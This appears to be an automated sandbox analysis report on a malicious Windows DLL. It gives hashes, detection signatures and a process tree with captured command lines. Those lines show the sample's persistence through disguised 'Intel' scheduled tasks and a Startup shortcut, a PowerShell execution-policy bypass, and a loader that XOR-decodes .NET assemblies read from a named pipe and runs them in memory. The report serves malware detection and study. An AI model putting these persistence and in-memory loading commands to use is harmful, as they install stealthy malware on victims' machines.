Edit tour
Windows
Analysis Report
uEhN67huiV.dll
Overview
General Information
| Sample name: | uEhN67huiV.dllrenamed because original name is a hash value |
| Original sample name: | 6d54f141eb720b107b479bf46db29af4df2b96fe090b3ddaf835b3a1d1ed40a1.dll.exe |
| Analysis ID: | 1576676 |
| MD5: | 217191ece640821660fb91ccda6e3422 |
| SHA1: | a0237e393079a306f70bd436c15c5b7abb4e8a23 |
| SHA256: | 6d54f141eb720b107b479bf46db29af4df2b96fe090b3ddaf835b3a1d1ed40a1 |
| Tags: | exeuser-JAMESWT_MHT |
| Infos: |  |
 | |
Detection
| Score: | 84 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Bypasses PowerShell execution policy
Powershell creates an autostart link
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
loaddll64.exe (PID: 5864 cmdline: loaddll64. exe "C:\Us ers\user\D esktop\uEh N67huiV.dl l" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52) 
conhost.exe (PID: 2684 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6256 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\uEh N67huiV.dl l",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
rundll32.exe (PID: 4464 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",#1 MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 5728 cmdline:
rundll32.e xe C:\User s\user\Des ktop\uEhN6 7huiV.dll, DllMainer MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 3760 cmdline:
rundll32.e xe C:\User s\user\Des ktop\uEhN6 7huiV.dll, DllMainerI nstall MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 5900 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 3920 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_Hel per /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4640 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_OnL ogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 5232 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 3800 cmdline: "powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_OnLogO nDaily\" / xml \"C:\U sers\user\ AppData\Lo cal\task.x ml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4808 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_OnL ogOnDaily /xml C:\Us ers\user\A ppData\Loc al\task.xm l MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 5040 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_Helper \" /xml \" C:\Users\u ser\AppDat a\Local\ta sk.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7236 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_Hel per /xml C :\Users\us er\AppData \Local\tas k.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2) - rundll32.exe (PID: 7128 cmdline:
rundll32.e xe C:\User s\user\Des ktop\uEhN6 7huiV.dll, DllMainerI nstallUser Only MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 7248 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7320 cmdline:
"powershel l.exe" -No Profile -E xecutionPo licy Bypas s -Command $WSc riptShell = New-Obje ct -ComObj ect WScrip t.Shell $Shortcu t = $WScri ptShell.Cr eateShortc ut('C:\Use rs\user\Ap pData\Roam ing/Micros oft/Window s/Start Me nu/Program s/Startup/ IntelManag ementEngin e.lnk') $Shortcu t.TargetPa th = 'powe rshell.exe ' $Sho rtcut.Desc ription = 'The Intel Managemen t Engine ( ME) is an embedded m icrocontro ller runni ng on a de dicated mi croprocess or integra ted into I ntel chips ets.' $Shortcut. Arguments = '-NoProf ile -Execu tionPolicy Bypass -C ommand C:\ Windows\Sy stem32\run dll32.exe "C:\Users\ user\AppDa ta\Roaming /IntelMana gementUnit /Mainer.dl l",DllMain erUserOnly ' $Sho rtcut.Wind owStyle = 7 $Sho rtcut.Save () MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7328 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7468 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",DllMaine r MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7476 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",DllMaine rInstall MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 8048 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 8104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5040 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_Hel per /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 3528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7568 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_OnL ogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 7672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 7700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7284 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_OnLogO nDaily\" / xml \"C:\U sers\user\ AppData\Lo cal\task.x ml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6340 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_OnL ogOnDaily /xml C:\Us ers\user\A ppData\Loc al\task.xm l MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 6340 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoProfile -Executio nPolicy By pass -Comm and C:\Win dows\Syste m32\rundll 32.exe C:\ Users\user \AppData\R oaming/Int elManageme ntUnit/Mai ner.dll,Dl lMainerUse rOnly MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7456 cmdline:
"C:\Window s\System32 \rundll32. exe" C:\Us ers\user\A ppData\Roa ming/Intel Management Unit/Maine r.dll,DllM ainerUserO nly MD5: EF3179D498793BF4234F708D3BE28633) - powershell.exe (PID: 7964 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_Helper \" /xml \" C:\Users\u ser\AppDat a\Local\ta sk.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7904 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_Hel per /xml C :\Users\us er\AppData \Local\tas k.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2) - rundll32.exe (PID: 7500 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",DllMaine rInstallUs erOnly MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 7332 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 4820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6348 cmdline:
"powershel l.exe" -No Profile -E xecutionPo licy Bypas s -Command $WSc riptShell = New-Obje ct -ComObj ect WScrip t.Shell $Shortcu t = $WScri ptShell.Cr eateShortc ut('C:\Use rs\user\Ap pData\Roam ing/Micros oft/Window s/Start Me nu/Program s/Startup/ IntelManag ementEngin e.lnk') $Shortcu t.TargetPa th = 'powe rshell.exe ' $Sho rtcut.Desc ription = 'The Intel Managemen t Engine ( ME) is an embedded m icrocontro ller runni ng on a de dicated mi croprocess or integra ted into I ntel chips ets.' $Shortcut. Arguments = '-NoProf ile -Execu tionPolicy Bypass -C ommand C:\ Windows\Sy stem32\run dll32.exe "C:\Users\ user\AppDa ta\Roaming /IntelMana gementUnit /Mainer.dl l",DllMain erUserOnly ' $Sho rtcut.Wind owStyle = 7 $Sho rtcut.Save () MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7520 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",Dummy MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7532 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",DotNetRu ntimeDebug Header MD5: EF3179D498793BF4234F708D3BE28633) 
WerFault.exe (PID: 7248 cmdline: C:\Windows \system32\ WerFault.e xe -u -p 7 532 -s 380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - rundll32.exe (PID: 7588 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",DllMaine rUserOnly MD5: EF3179D498793BF4234F708D3BE28633) - powershell.exe (PID: 1092 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "Write-Hos t 'Dummy p rocess sta rted. Pres s Ctrl+C t o exit.'; while ($tr ue) { try { Start-Sl eep -Secon ds 1 } cat ch { Write -Host 'Clo se signal received. Exiting... '; break } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2748 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"KKVXTTA LMQKJXGHUI VTMRYXKTCB LJUKGSQAQQ VCIJOFAURC WCUVMXEFSE JMVMLDXFVK VWCOUGOEFX UIAFLXQWLR VMBMINXCLX XAVVAAVCFU XMRVSFXWSA NYMHNFPSBT H\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 156160;$ rrrr=$in_p ipe.Read($ buffer, 0, $buffer.L ength);$aa aa=Load-As sembly($bu ffer);;;;$ buffer = n ew-object byte[] 215 04;$rrrr=$ in_pipe.Re ad($buffer , 0, $buff er.Length) ;$aaaa=Loa d-Assembly ($buffer); ;;;" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7412 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"GAPFBYM IIDIBSAEOJ YHVNMUBOXJ FHRPWIKEMM VHMQAIKDKJ RKXOSBPHHN MWOEEEJRHQ HVBHYURUJG AMRGLBSYRA TIKWBUSQSM IGFPYGIWGH YEQXNWKONX LKOEGPRSYL Y\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 156160;$ rrrr=$in_p ipe.Read($ buffer, 0, $buffer.L ength);$aa aa=Load-As sembly($bu ffer);;;;$ buffer = n ew-object byte[] 189 44;$rrrr=$ in_pipe.Re ad($buffer , 0, $buff er.Length) ;$aaaa=Loa d-Assembly ($buffer); ;;;" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1836 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"XYKYPLG RXTLBHRLAA LQLRMGCAAM JSFVPYFKBD UULYXQVIEL TAYFOOSCVD DLHPVLLLCD LHUSNKBXMD CNMHKHJKRE YMAPWJPKLU CBWLYEHVPM JNWJGCMLNF SWYRQOIAAI Q\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 3887104; $rrrr=$in_ pipe.Read( $buffer, 0 , $buffer. Length);$a aaa=Load-A ssembly($b uffer);;;; " MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7604 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\uEhN 67huiV.dll ",DllMaine rSmartAndS ilent MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: | ||
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||